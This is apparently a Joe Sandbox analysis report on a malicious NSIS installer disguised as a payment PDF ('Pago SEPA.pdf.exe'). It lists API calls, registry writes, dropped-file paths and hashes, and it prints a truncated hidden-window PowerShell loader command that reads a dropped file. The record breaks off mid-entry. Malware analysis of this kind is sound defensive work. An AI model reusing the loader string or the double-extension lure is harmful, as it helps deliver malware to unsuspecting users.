                                                                      • Instruction ID: d2f3f002a39499475f228c0a6bab6309b881bedc09a5d6a8f103fb05119b383a
                                                                      • Opcode Fuzzy Hash: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
                                                                      • Instruction Fuzzy Hash: DE010871D14219EAEF119FA0CD047EFBFB8EB14314F10853AD909B6190E779A604CFAA

                                                                      Control-flow Graph

                                                                      • Function entry 401bdf (rendered block graph with Executed / Not Executed colouring not reproduced)
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971

Control-flow Graph (image not captured; basic blocks 405c23-405c75, calling GetTickCount and GetTempFileNameW)
APIs
• GetTickCount.KERNEL32 ref: 00405C41
• GetTempFileNameW.KERNELBASE(00409300,?,00000000,?,?,?,00000000,00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00405C5C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: CountFileNameTempTick
• String ID: C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-44229769

Control-flow Graph (image not captured; basic blocks 406389-4063f2, calling GetSystemDirectoryW, wsprintfW and LoadLibraryW)
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063A0
• wsprintfW.USER32 ref: 004063DB
• LoadLibraryW.KERNELBASE(?), ref: 004063EB
Strings
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll
• API String ID: 2200240437-2744773210

Control-flow Graph (image not captured; basic blocks 40237b-4024fc and 402a4c-402a5b, calling RegCreateKeyExW, lstrlenW, RegSetValueExW and RegCloseKey)
APIs
• RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
• lstrlenW.KERNEL32(0040A5C8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
• RegSetValueExW.KERNELBASE(?,?,?,?,0040A5C8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
• RegCloseKey.ADVAPI32(?,?,?,0040A5C8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
Similarity
• API ID: CloseCreateValuelstrlen
• String ID:
• API String ID: 1356686001-0
APIs
  • Part of subcall function 0040517E: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
  • Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
  • Part of subcall function 0040517E: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00403160,00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000), ref: 004051D9
  • Part of subcall function 0040517E: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\), ref: 004051EB
  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
  • Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
  • Part of subcall function 004056FF: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
  • Part of subcall function 004056FF: CloseHandle.KERNEL32(00409300), ref: 00405735
• WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
• WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
• GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
Similarity
• API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
• String ID:
• API String ID: 3585118688-0
APIs
  • Part of subcall function 00405A7E: CharNextW.USER32(?,?,00424F10,00409300,00405AF2,00424F10,00424F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405830,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 00405A8C
  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405A91
  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405AA9
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
  • Part of subcall function 0040564D: CreateDirectoryW.KERNELBASE(?,00409300,C:\Users\user\AppData\Local\Temp\), ref: 00405690
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers,?,00000000,000000F0), ref: 00401645
Strings
• C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers, xrefs: 00401638
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers
• API String ID: 1892508949-1972456662
APIs
  • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
  • Part of subcall function 00405A7E: CharNextW.USER32(?,?,00424F10,00409300,00405AF2,00424F10,00424F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405830,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 00405A8C
  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405A91
  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405AA9
• lstrlenW.KERNEL32(00424F10,00000000,00424F10,00424F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405830,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 00405B34
• GetFileAttributesW.KERNELBASE(00424F10,00424F10,00424F10,00424F10,00424F10,00424F10,00000000,00424F10,00424F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405830,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405B44
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405ADB
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 3248276644-823278215
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
                                                                      • CloseHandle.KERNEL32(00409300), ref: 00405735
                                                                      Strings
                                                                      • Error launching installer, xrefs: 00405712
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: b8225b8e790b3fd0efe802e75bacfbac7fa780f619c07fe13b6fa50099ed031b
                                                                      • Instruction ID: 0e3d6bea0253e84bb75e95f5fd13ebb7f1c25267a9e23a2e11a0c59c818b3a51
                                                                      • Opcode Fuzzy Hash: b8225b8e790b3fd0efe802e75bacfbac7fa780f619c07fe13b6fa50099ed031b
                                                                      • Instruction Fuzzy Hash: A1E0BFB4A50209BFEB10AB64ED45F7B77ADE704604F408521BD10F6190D774A9118A79
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f1b0bcb74e89e0527ce0e7aeb25a080aa3b7917c16b08ac734cf8879bcce8d5f
                                                                      • Instruction ID: 5fe4abb7369df3af91b149f2edb7ea720d50bcc67b973f9abb1089395dd24c70
                                                                      • Opcode Fuzzy Hash: f1b0bcb74e89e0527ce0e7aeb25a080aa3b7917c16b08ac734cf8879bcce8d5f
                                                                      • Instruction Fuzzy Hash: C0A14471E00229CBDF28CFA8C8546ADBBB1FF44305F11856AD956BB281C7785A96CF44
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d9f9556e65149fb8038c12abebdeeaff41015fbe822045bf8c0f712664e9a4c
                                                                      • Instruction ID: 7dc68a506d8d0f3fe9b520a6289ddaa7cfd75a66a39107a8603bac83b987cce9
                                                                      • Opcode Fuzzy Hash: 4d9f9556e65149fb8038c12abebdeeaff41015fbe822045bf8c0f712664e9a4c
                                                                      • Instruction Fuzzy Hash: 58912370D00229CBDF28CFA8C854BADBBB1FF44305F15816AD956BB291C7789A96CF44
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fedee03a87f183305429df1632bc9847bb667c1ae34a6a4f86b425fb5205d62c
                                                                      • Instruction ID: aa61b8b4d6b896fc10b82c5715850ba22d426d73d4dcb40af3c311b95fbd5bbf
                                                                      • Opcode Fuzzy Hash: fedee03a87f183305429df1632bc9847bb667c1ae34a6a4f86b425fb5205d62c
                                                                      • Instruction Fuzzy Hash: 1B815671E00229CFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7789A96CF54
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e8c959f377d96a3870dba63dd65060f52c5bbf460a72db2a5b2be4756d911549
                                                                      • Instruction ID: 6afa8d85982321809285efd67767f231e28451523f56623c0a237c64ba690010
                                                                      • Opcode Fuzzy Hash: e8c959f377d96a3870dba63dd65060f52c5bbf460a72db2a5b2be4756d911549
                                                                      • Instruction Fuzzy Hash: 7E816731E00229DBDF24CFA9D844BADBBB0FB44305F11816AE856BB2C0C7785A96DF44
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0a8ee5da33216ad141207925d20784d11e66eebf924bd7a5457e3a8945fa9096
                                                                      • Instruction ID: b0afa4bf9b2f32aef8b418d90c6ac84aec3754d6d6600e102a8a9184c58ea877
                                                                      • Opcode Fuzzy Hash: 0a8ee5da33216ad141207925d20784d11e66eebf924bd7a5457e3a8945fa9096
                                                                      • Instruction Fuzzy Hash: FD712471E00229DFDF24CFA8C844BADBBB1FB48305F15806AD846BB290C7395996DF54
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
                                                                      • Instruction ID: 02d0d75cb83947f83aad45c50880e4a386b83e744e149296eb7fa161ab999f08
                                                                      • Opcode Fuzzy Hash: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
                                                                      • Instruction Fuzzy Hash: 08714671E00219CFDF24CFA8C844BADBBB1FB44305F15806AD856BB290C7385956DF44
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
                                                                      • Instruction ID: eb15c3353e008649bdc799d0a197d89dfb60748dd6a42a5e4cae05a50034cddc
                                                                      • Opcode Fuzzy Hash: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
                                                                      • Instruction Fuzzy Hash: 67714571E00229DBDF28CF98C844BADBBB1FF44305F11806AD956BB291C7789A66DF44
                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401BA7
                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                      Strings
                                                                      • "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen, xrefs: 00401B5E, 00401B64, 00401B7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree
                                                                      • String ID: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen
                                                                      • API String ID: 3394109436-2170860038
                                                                      • Opcode ID: a82634369664395a32d5951a50e6f1b5a10201841b9bf8d860b13a3c12bda3fe
                                                                      • Instruction ID: 6437723b9896d782a6b7fabab6bc3621d1df67fb8e76a078729fc3794235ac76
                                                                      • Opcode Fuzzy Hash: a82634369664395a32d5951a50e6f1b5a10201841b9bf8d860b13a3c12bda3fe
                                                                      • Instruction Fuzzy Hash: 5D219672610102ABCB20EFA4CD8595EB7F5EF44314725403BF606B72D1DB7898519F9D
APIs
  • Part of subcall function 00405BCF: GetFileAttributesW.KERNELBASE(?,?,004057D4,?,?,00000000,004059AA,?,?,?,?), ref: 00405BD4
  • Part of subcall function 00405BCF: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BE8
• RemoveDirectoryW.KERNELBASE(?,?,?,00000000,004059AA), ref: 004057E3
• DeleteFileW.KERNEL32(?,?,?,00000000,004059AA), ref: 004057EB
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405803
Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
Similarity
• API ID: File$Attributes$DeleteDirectoryRemove
• String ID:
• API String ID: 1655745494-0
• Opcode ID: b6c9e388321ce1c96275a05dc803513c5bf951cc4d2342509a9d6f8351b9d3be
• Instruction ID: 4a1556df6e167e4727bc7f40320860e210b77304fa0693aaa04bcc3abbce102b
• Opcode Fuzzy Hash: b6c9e388321ce1c96275a05dc803513c5bf951cc4d2342509a9d6f8351b9d3be
• Instruction Fuzzy Hash: AAE0E532109A5196C21067358808A5F2A94DF86315F054936F856B31C1D37858469ABF
APIs
  • Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
  • Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?), ref: 00406422
• GetFileVersionInfoSizeW.KERNELBASE(00000008,00000000,?,000000EE), ref: 00401F33
• GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401F52
  • Part of subcall function 00405F66: wsprintfW.USER32 ref: 00405F73
Memory Dump Source
